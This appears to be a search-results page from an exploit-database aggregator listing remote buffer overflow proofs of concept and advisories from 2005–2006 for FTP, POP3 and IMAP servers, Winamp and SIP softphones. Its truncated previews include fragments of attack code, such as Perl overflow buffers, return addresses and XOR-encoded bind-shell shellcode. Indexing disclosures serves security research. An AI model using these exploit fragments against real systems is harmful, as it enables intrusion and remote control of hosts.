Lucene search
+L

2039 matches found

Exploit DB
Exploit DB
added 2006/02/25 12:0 a.m.27 views

ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)

!/usr/bin/perl ---------------------------------------------------- ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server Jerome Athias ---------------------------------------------------- use Net::FTP; geting data $host = @ARGV0; $port = @ARGV1; $debug = @ARGV2; $user = @ARGV3; $pass = @ARGV4;...

5.8AI score
SaveExploits0
securityvulns
securityvulns
added 2006/02/16 12:0 a.m.30 views

[Full-disclosure] Winamp .m3u fun again ;)

Winamp .m3u Remote Buffer Overflow Vulnerability 0day by Sowhat Discovery: 2005.07.21 Pubulished: 2006.02.16 http://secway.org/advisory/AD20060216.txt Affected: Winamp All versions including 5.13 Overview: WinAMP is a popular media player that supports various media and playlist formats, includin...

SaveExploits0
seebug.org
seebug.org
added 2006/02/03 12:0 a.m.16 views

eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl -w for educational purposes only . use IO::Socket; if $ARGV0 print "\n write the target IP!! \n\n"; exit; $buffer2 = "\x90"x1999999; $mailf= "mail"; $rcptt ="rcpt to:"; $buffer = "\x41"x4100; $ret = "\x80\x1d\xdc\x02"; $shellcode =...

7.1AI score
SaveExploits0
zdt
zdt
added 2006/02/03 12:0 a.m.19 views

eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================= eXchange POP3 5.0.050203 rcpt to Remote Buffer Overflow Exploit ================================================================= !/usr/bin/perl -w for educational purposes...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/01/31 12:0 a.m.23 views

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)

No description provided by source. // Two includes. include fstream.h include winsock2.h // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/31 12:0 a.m.32 views

KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)

// Two includes. include include // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99" "\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777...

7.5CVSS5.8AI score0.71EPSS
SaveExploits13
exploitpack
exploitpack
added 2006/01/29 12:0 a.m.11 views

Winamp 5.12 - .pls Remote Buffer Overflow (1)

Winamp 5.12 - .pls Remote Buffer Overflow 1 / Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP P...

1AI score
SaveExploits0
zdt
zdt
added 2006/01/29 12:0 a.m.19 views

Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Expl (0-Day)

Exploit for unknown platform in category remote exploits =================================================================== Winamp include define BUFLEN 0x045D define PLAYLISTFILE "crafted.pls" char szPlayListHeader1 = "playlist\r\nFile1=\\"; char szPlayListHeader2 =...

7.1AI score
SaveExploits0
zdt
zdt
added 2006/01/25 12:0 a.m.40 views

Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC

Exploit for unknown platform in category remote exploits ============================================================ Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC ============================================================ !/usr/bin/perl Sami FTP Server v2.0.1 Remote notepad.exe...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2006/01/16 12:0 a.m.35 views

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...

1AI score
SaveExploits0
exploitpack
exploitpack
added 2006/01/15 12:0 a.m.13 views

CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)

CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow 2 // source: https://www.securityfocus.com/bid/16253/info A remote buffer-overflow vulnerability affects CounterPath eyeBeam because the application fails to properly validate the length of user-supplied strings prior to...

0.8AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/15 12:0 a.m.38 views

CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)

// source: https://www.securityfocus.com/bid/16253/info A remote buffer-overflow vulnerability affects CounterPath eyeBeam because the application fails to properly validate the length of user-supplied strings prior to copying them into static process buffers. An attacker may exploit this issue t...

7.5CVSS5.8AI score0.04016EPSS
SaveExploits2
zdt
zdt
added 2006/01/12 12:0 a.m.17 views

eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================= eStara Softphone include unsigned char invite = 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E,...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/07 12:0 a.m.28 views

Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow

source: https://www.securityfocus.com/bid/16298/info Dual DHCP DNS Server is prone to a remote buffer overflow vulnerability. The vulnerability presents itself when the server handles excessive data through the DHCP options field. Successful exploitation can allow attackers to trigger a denial of...

7.5CVSS5.8AI score0.06503EPSS
SaveExploits2
securityvulns
securityvulns
added 2005/12/20 12:0 a.m.24 views

[Full-disclosure] Remote Buffer Overflow in Mailenable Enterprise 1.1

See-Security Research and Development. - Product Information MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effectiv...

0.4AI score
SaveExploits0
exploitpack
exploitpack
added 2005/12/19 12:0 a.m.12 views

MailEnable Enterprise Edition 1.1 - EXAMINE Remote Buffer Overflow

MailEnable Enterprise Edition 1.1 - EXAMINE Remote Buffer Overflow !/usr/bin/python Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow Discovered and exploited by [email protected] This vulnerability affects Mailenable Enterprise 1.1 without the ME-10009.EXE patch. Details: SEH gets...

0.2AI score
SaveExploits0
Tenable Nessus
Tenable Nessus
added 2005/12/19 12:0 a.m.42 views

ELOG Remote Buffer Overflow Vulnerabilities

The remote host appears to be using ELOG, a web-based electronic logbook application. The version of ELOG installed on the remote host crashes when it receives HTTP requests with excessive data for the 'mode' and 'cmd' parameters. An unauthenticated attacker may be able to exploit these issues to...

7.8CVSS6.2AI score0.06129EPSS
SaveExploits1References2
exploitpack
exploitpack
added 2005/11/16 12:0 a.m.32 views

FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)

FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow PoC !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host,...

1AI score
SaveExploits0
seebug.org
seebug.org
added 2005/11/16 12:0 a.m.12 views

FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC

No description provided by source. !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "143", ; unless $remote...

7.1AI score
SaveExploits0
zdt
zdt
added 2005/11/16 12:0 a.m.33 views

FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC

Exploit for unknown platform in category dos / poc ==================================================================== FTGate4 Groupware Mail Server 4.1 imapd Remote Buffer Overflow PoC ==================================================================== !/usr/bin/perl use IO::Socket; print...

7AI score
SaveExploits0
Rows per page
Query Builder